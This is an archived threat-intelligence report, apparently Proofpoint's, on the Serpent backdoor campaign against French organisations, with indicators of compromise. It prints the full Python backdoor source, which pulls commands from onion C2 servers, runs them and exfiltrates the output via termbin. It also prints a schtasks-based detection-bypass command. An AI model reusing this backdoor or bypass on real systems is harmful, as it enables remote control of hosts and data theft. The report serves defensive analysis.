{
	"id": "76801209-f03c-402c-85cc-eb4be395d32a",
	"created_at": "2026-04-06T00:22:09.547741Z",
	"updated_at": "2026-04-10T03:20:39.814752Z",
	"deleted_at": null,
	"sha1_hash": "951f69e3bb01708e40102eb3fd4bd92a1af97925",
	"title": "Serpent, No Swiping! New Backdoor Targets French Entities with Unique Attack Chain | Proofpoint US",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2489448,
	"plain_text": "Serpent, No Swiping! New Backdoor Targets French Entities with\r\nUnique Attack Chain | Proofpoint US\r\nBy Bryan Campbell, Zachary Abzug, Andrew Northern and Selena Larson\r\nPublished: 2022-03-18 · Archived: 2026-04-05 20:20:49 UTC\r\nKey Findings\r\nProofpoint identified a targeted attack leveraging an open-source package installer Chocolatey to deliver a\r\nbackdoor.\r\nThe attack targeted French entities in the construction, real estate, and government industries. \r\nThe attacker used a resume themed subject and lure purporting to be GDPR information.\r\nThe attacker used steganography, including a cartoon image, to download and install the Serpent backdoor. \r\nThe attacker also demonstrated a novel detection bypass technique using a Scheduled Task. \r\nObjectives are currently unknown however based on the tactics and targeting observed it is likely an\r\nadvanced, targeted threat.\r\nOverview\r\nProofpoint observed new, targeted activity impacting French entities in the construction and government sectors.\r\nThe threat actor used macro-enabled Microsoft Word documents to distribute the Chocolatey installer package, an\r\nopen-source package installer. Various parts of the VBA macro include the following ASCII art and depict a snake\r\nas below. \r\nThe threat actor attempted to install a backdoor on a potential victim’s device, which could enable remote\r\nadministration, command and control (C2), data theft, or deliver other additional payloads. Proofpoint refers to\r\nthis backdoor as Serpent. The ultimate objective of the threat actor is currently unknown.\r\nCampaign Details\r\nhttps://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain\r\nPage 1 of 9\n\nIn the observed campaign, messages are in French and purport to be, for example:\r\nFrom: \"Jeanne\" \u003cjeanne.vrakele@gmail[.]com\u003e\r\nSubject \"Candidature - Jeanne Vrakele\"\r\nThe messages contain a macro-enabled Microsoft Word document masquerading as information relating to the\r\n“règlement général sur la protection des données (RGPD)” or the European Union’s General Data Protection\r\nRegulations (GDPR).\r\nFigure 1: GDPR themed lure.\r\nWhen macros are enabled, the document executes that macro, which reaches out to an image URL, e.g.,\r\nhttps://www.fhccu[.]com/images/ship3[.]jpg, containing a base64 encoded PowerShell script hidden in the image\r\nusing steganography. The PowerShell script first downloads, installs, and updates the Chocolatey installer package\r\nand repository script. Chocolatey is a software management automation tool for Windows that wraps installers,\r\nexecutables, zips, and scripts into compiled packages, similar to Homebrew for OSX. The software provides both\r\nopen-source and paid versions with various levels of functionality. Proofpoint has not previously observed a threat\r\nactor use Chocolatey in campaigns.\r\nThe script then uses Chocolatey to install Python, including the pip Python package installer, which it then uses to\r\ninstall various dependencies including PySocks, a Python based reverse proxy client that enables users to send\r\ntraffic through SOCKS and HTTP proxy servers.\r\nNext, the script fetches another image file, e.g. https://www.fhccu[.]com/images/7[.]jpg, which contains a base64\r\nencoded Python script also hidden using steganography, and saves the Python script as\r\nMicrosoftSecurityUpdate.py. The script then creates and executes a .bat file that in turn executes the Python script.\r\nhttps://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain\r\nPage 2 of 9\n\nThe attack chain ends with a command to a shortened URL which redirects to the Microsoft Office help website.\r\nFigure 2: “Swiper” image with base64 encoded PowerShell script to download and install Chocolatey and\r\nPython and fetch another steganographic image.\r\nThe Python script (the Serpent backdoor) is as follows:\r\n#!/usr/bin/python3\r\nfrom subprocess import Popen, PIPE, STDOUT\r\nimport requests\r\nimport re\r\nimport socket\r\nimport time\r\nhttps://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain\r\nPage 3 of 9\n\ncmd_url_order = 'http://mhocujuh3h6fek7k4efpxo5teyigezqkpixkbvc2mzaaprmusze6icqd.onion.pet/index.html'\r\ncmd_url_answer = 'http://ggfwk7yj5hus3ujdls5bjza4apkpfw5bjqbq4j6rixlogylr5x67dmid.onion.pet/index.html'\r\nhostname = socket.gethostname()\r\nhostname_pattern = 'host:%s-00' % hostname\r\nheaders = {}\r\nreferer = {'Referer': hostname_pattern}\r\ncache_control = {'Cache-Control': 'no-cache'}\r\nheaders.update(referer)\r\nheaders.update(cache_control)\r\ncheck_cmd_1 = ''\r\ndef recvall(sock, n):\r\n  data = b''\r\n  while len(data) \u003c n:\r\n    packet = sock.recv(n - len(data))\r\n    if not packet:\r\n      return None\r\n    data += packet\r\n  return data\r\ndef get_cmd():\r\n    req = requests.get(cmd_url_order, headers=headers).content.decode().strip()\r\n    if req == '':\r\n        pass\r\n    else:\r\n        return req\r\ndef run_cmd(cmd):\r\n    cmd_split = cmd.split('--')\r\n    if cmd_split[1] == hostname:\r\n        cmd = cmd_split[2]\r\n        print(cmd)\r\n        run = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=STDOUT)#.decode()\r\n        out = run.stdout.read()\r\n        if not out:\r\n            out = b'ok'\r\n        termbin_cnx = socks.socksocket()\r\n        termbin_cnx = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n        socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, '172.17.0.1', '9050', True)\r\n        termbin_cnx.connect(('termbin.com', 9999))\r\n        termbin_cnx.send(out)\r\n        recv = termbin_cnx.recv(100000)\r\n        termbin_url_created = recv.decode().rstrip('\\x00').strip()\r\nhttps://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain\r\nPage 4 of 9\n\nprint(termbin_url_created)\r\n        termbin_header = {'Referer': hostname_pattern+\" -- \"+termbin_url_created}\r\n        headers.update(termbin_header)\r\n        try:\r\n            push = requests.get(cmd_url_answer, headers=headers)\r\n            print('executed')\r\n            headers.update(referer)\r\n        except Exception as e:\r\n            print(e)\r\n            pass\r\n    else:\r\n        print('not for me')\r\n        while True:\r\n    time.sleep(10)\r\n    try:\r\n        check_cmd = get_cmd()\r\n        if check_cmd != check_cmd_1:\r\n            time.sleep(20)\r\n            print(check_cmd)\r\n            run_cmd(check_cmd)\r\n            check_cmd_1 = check_cmd\r\n            pass\r\n    except Exception as e:\r\n        print(e)\r\n        pass\r\nThis Serpent backdoor periodically pings the “order” server (the first onion[.]pet URL) and expects responses of\r\nthe form \u003crandom integer\u003e--\u003chostname\u003e--\u003ccommand\u003e. If \u003chostname\u003e matches the hostname of the infected\r\ncomputer, the infected host runs the command provided by the order server (\u003ccommand\u003e), which could be any\r\nWindows command as designated by the attacker, and records the output. The malware then uses PySocks to\r\nconnect to the command line pastebin tool Termbin, pastes the output to a bin, and receives the bin’s unique URL.\r\nFinally, the malware sends a request to the “answer” server (the second onion[.]pet URL), including the hostname\r\nand bin URL in the header. This allows the attacker to monitor the bin outputs via the “answer” URL and see what\r\nthe infected host’s response was. The malware cycles through this process indefinitely.\r\nhttps://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain\r\nPage 5 of 9\n\nFigure 3: Serpent backdoor attack chain.\r\nBoth steganographic images are hosted on what appears to be a Jamaican credit union website.\r\nFigure 4: Image with base64 encoded Python script.\r\nhttps://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain\r\nPage 6 of 9\n\nThe threat actor uses a Tor proxy for command and control (C2) infrastructure, for example:\r\nhttp://mhocujuh3h6fek7k4efpxo5teyigezqkpixkbvc2mzaaprmusze6icqd[.]onion[.]pet/index.html\r\nAdditional Tooling\r\nIn addition to the images used in this attack chain Proofpoint researchers have observed and identified additional\r\npayloads being served from the same host. One of particular interest is utilizing what Proofpoint believes to be a\r\nnovel application of signed binary proxy execution using schtasks.exe. Notably, this is an attempt to bypass\r\ndetection by defensive measures.\r\nThis command is contained within a similar Swiper image called ship.jpg after the end of file marker.\r\nschtasks.exe /CREATE /SC ONEVENT /EC application /mo *[System/EventID=777] /f /TN run /TR \"calc.exe\" \u0026\r\nEVENTCREATE /ID 777 /L APPLICATION /T INFORMATION /SO DummyEvent /D \"Initiatescheduled task.\"\r\n\u0026  schtasks.exe /DELETE /TN run /f\r\nThe above command leverages schtasks.exe to create a one-time task to call a portable executable. In this case the\r\nexecutable is called calc.exe. The trigger for this task is contingent on the creation of a Windows event with\r\nEventID of 777. The command then creates a dummy event to trigger the task and deletes the task from the task\r\nscheduler. This peculiar application of tasking logic results in the portable executable being executed as a child\r\nprocess of taskhostsw.exe which is a signed Windows binary.\r\nThreat Assessment\r\nThe threat actor leveraged multiple unique behaviors and targeting suggesting this is likely an advanced, targeted\r\nthreat.\r\nLeveraging Chocolatey as an initial payload may allow the threat actor to bypass threat detection mechanisms\r\nbecause it is a legitimate software package and would not immediately be identified as malicious. The follow-on\r\nuse of legitimate Python tools observed in network traffic may also not be flagged or identified as malicious. The\r\nuse of steganography in the macro and follow-on payloads is unique; Proofpoint rarely observes the use of\r\nsteganography in campaigns. Additionally, the technique using schtasks.exe to execute any desired portable\r\nexecutable file is also unique and previously unobserved by Proofpoint threat researchers.\r\nProofpoint does not associate this threat with a known actor or group.\r\nThe ultimate objectives of the threat actor are presently unknown. Successful compromise would enable a threat\r\nactor to conduct a variety of activities, including stealing information, obtaining control of an infected host, or\r\ninstalling additional payloads.\r\nA Note on Highly Targeted Threats\r\nProofpoint has a vast amount of organic threat data to pour over every day. This presents unique challenges when\r\ntrying to surface interesting threats. The aforementioned campaign and the threats contained within were surfaced\r\nusing Proofpoint’s machine learning-enabled Campaign Discovery tool. This tool uses a custom-built deep neural\r\nhttps://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain\r\nPage 7 of 9\n\nnetwork model to generate useful numeric “encodings” of threats based on their behavioral forensics. These\r\nencodings are then used to generate clusters of similar threats. This allows Proofpoint’s threat researchers to\r\nidentify campaigns, including the shared infrastructure, TTPs, and indicators of compromise that define them\r\nmore easily. By clustering together threats that are alike, the tool also facilitates the discovery of anomalous or\r\nunusual threats that are not similar to any other observed threats. We lovingly refer to this tool as Camp Disco and\r\nit sports themed ascii art like all sweet tools should.\r\nIndicators of Compromise\r\nIndicator Description\r\nhttps://www[.]fhccu[.]com/images/ship3[.]jpg Encoded Payload URL\r\nhttps://www[.]fhccu[.]com/images/7[.]jpg Encoded Payload URL\r\nhttps://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain\r\nPage 8 of 9\n\nhttp://ggfwk7yj5hus3ujdls5bjza4apkpfw5bjqbq4j6rixlogylr5x67dmid\r\n[.]onion[.]pet/index[.]html\r\nC2\r\nhttp://mhocujuh3h6fek7k4efpxo5teyigezqkpixkbvc2mzaaprmusze6icqd\r\n[.]onion[.]pet/index[.]html\r\nC2\r\nhttp://shorturl[.]at/qzES8 ShortURL\r\njeanne.vrakele@gmail[.]com Sender Email\r\njean.dupontel@protonmail[.]com Sender Email\r\nno-reply@dgfip-nanterre[.]com Sender Email\r\nf988e252551fe83b5fc3749e1d844c31fad60be0c25e546c80dbb9923e03eaf2 Docm SHA256\r\nec8c8c44eae3360be03e88a4bc7bb03f3de8d0a298bff7250941776fcea9faab Docm SHA256\r\n8912f7255b8f091e90083e584709cf0c69a9b55e09587f5927c9ac39447d6a19 Docm SHA256\r\nProofpoint detects and blocks all documents associated with the campaigns and has published the following\r\nEmerging Threat signatures:\r\n2035303 - ET INFO Observed Chocolatey Windows Package Management Domain (chocolatey .org in TLS SNI)\r\n2035306 - ET INFO Chocolatey Windows Package Management Installation File Retrieval\r\n2851286 - ETPRO MALWARE Malicious Script Retrieved via Image Request\r\nSource: https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain\r\nhttps://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE"
	],
	"references": [
		"https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain"
	],
	"report_names": [
		"serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain"
	],
	"threat_actors": [],
	"ts_created_at": 1775434929,
	"ts_updated_at": 1775791239,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/951f69e3bb01708e40102eb3fd4bd92a1af97925.pdf",
		"text": "https://archive.orkl.eu/951f69e3bb01708e40102eb3fd4bd92a1af97925.txt",
		"img": "https://archive.orkl.eu/951f69e3bb01708e40102eb3fd4bd92a1af97925.jpg"
	}
}